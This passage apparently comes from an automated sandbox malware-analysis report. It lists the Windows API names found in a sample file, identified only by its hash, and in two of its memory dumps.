(Indicator: \"CreateEventA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"FindClose\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"InterlockedDecrement\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"Sleep\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"MoveFileW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SetFileAttributesW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"TlsSetValue\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetTickCount\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetFileSize\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"InterlockedIncrement\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SafeArrayAccessData\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SysStringLen\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SysAllocStringLen\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"VariantClear\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SafeArrayCreate\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SysFreeString\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"VariantInit\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SHGetSpecialFolderPathW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"ShellExecuteW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetMessageA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"UpdateWindow\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"EnumWindows\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"KillTimer\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"PostQuitMessage\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"DefWindowProcA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"ShowWindow\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SetWindowPos\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetWindowRect\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"DispatchMessageA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"EnableWindow\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"MoveWindow\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"PeekMessageA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SetWindowLongA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"TranslateMessage\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SetActiveWindow\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"RegisterClassExA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SystemParametersInfoA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SetWindowTextA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SendMessageA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetClientRect\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SetTimer\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetWindowLongA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"CreateWindowExA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"LoadCursorA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"LoadIconA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetWindowTextW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"CallWindowProcA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SetForegroundWindow\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"ExitWindowsEx\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"DestroyWindow\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"HttpSendRequestA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"HttpOpenRequestA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"InternetReadFile\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"InternetOpenA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"InternetConnectA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"HttpQueryInfoA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"WSAStartup\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"CoInitializeEx\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"StringFromCLSID\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"CoTaskMemFree\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"CoCreateFreeThreadedMarshaler\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"AllocateAndInitializeSid\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CheckTokenMembership\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateWellKnownSid\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"EqualSid\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FreeSid\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTokenInformation\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"OpenProcessToken\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyExW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegDeleteValueW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegFlushKey\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CompareStringW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateEventA\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateFileW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateProcessW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateSemaphoreA\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"DeleteFileW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"EnumResourceNamesA\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"ExpandEnvironmentStringsW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindClose\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindNextFileW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetFileSize\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTempPathW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetVolumeInformationW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"InterlockedCompareExchange\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"InterlockedDecrement\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"InterlockedIncrement\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"IsDBCSLeadByteEx\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"MoveFileExW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"MoveFileW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"OpenProcess\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"Process32First\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"Process32Next\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"ReleaseSemaphore\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetCurrentDirectoryW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetEvent\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetFileAttributesW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetFilePointer\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetLastError\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"TlsAlloc\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"TlsFree\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"TlsGetValue\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"TlsSetValue\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"VirtualQuery\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"WaitForMultipleObjects\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"lstrlenW\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"AllocateAndInitializeSid\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CheckTokenMembership\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateWellKnownSid\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"EqualSid\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FreeSid\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTokenInformation\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"OpenProcessToken\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyExW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegDeleteValueW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegFlushKey\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CompareStringW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateEventA\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateFileW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateProcessW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateSemaphoreA\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"DeleteFileW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"EnumResourceNamesA\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"ExpandEnvironmentStringsW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindClose\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FindNextFileW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetFileSize\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTempPathW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"GetVolumeInformationW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"InterlockedCompareExchange\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"InterlockedDecrement\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"InterlockedIncrement\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"IsDBCSLeadByteEx\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"MoveFileExW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"MoveFileW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"OpenProcess\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"Process32First\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"Process32Next\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"ReleaseSemaphore\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetCurrentDirectoryW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetEvent\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetFileAttributesW\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetFilePointer\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetLastError\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; 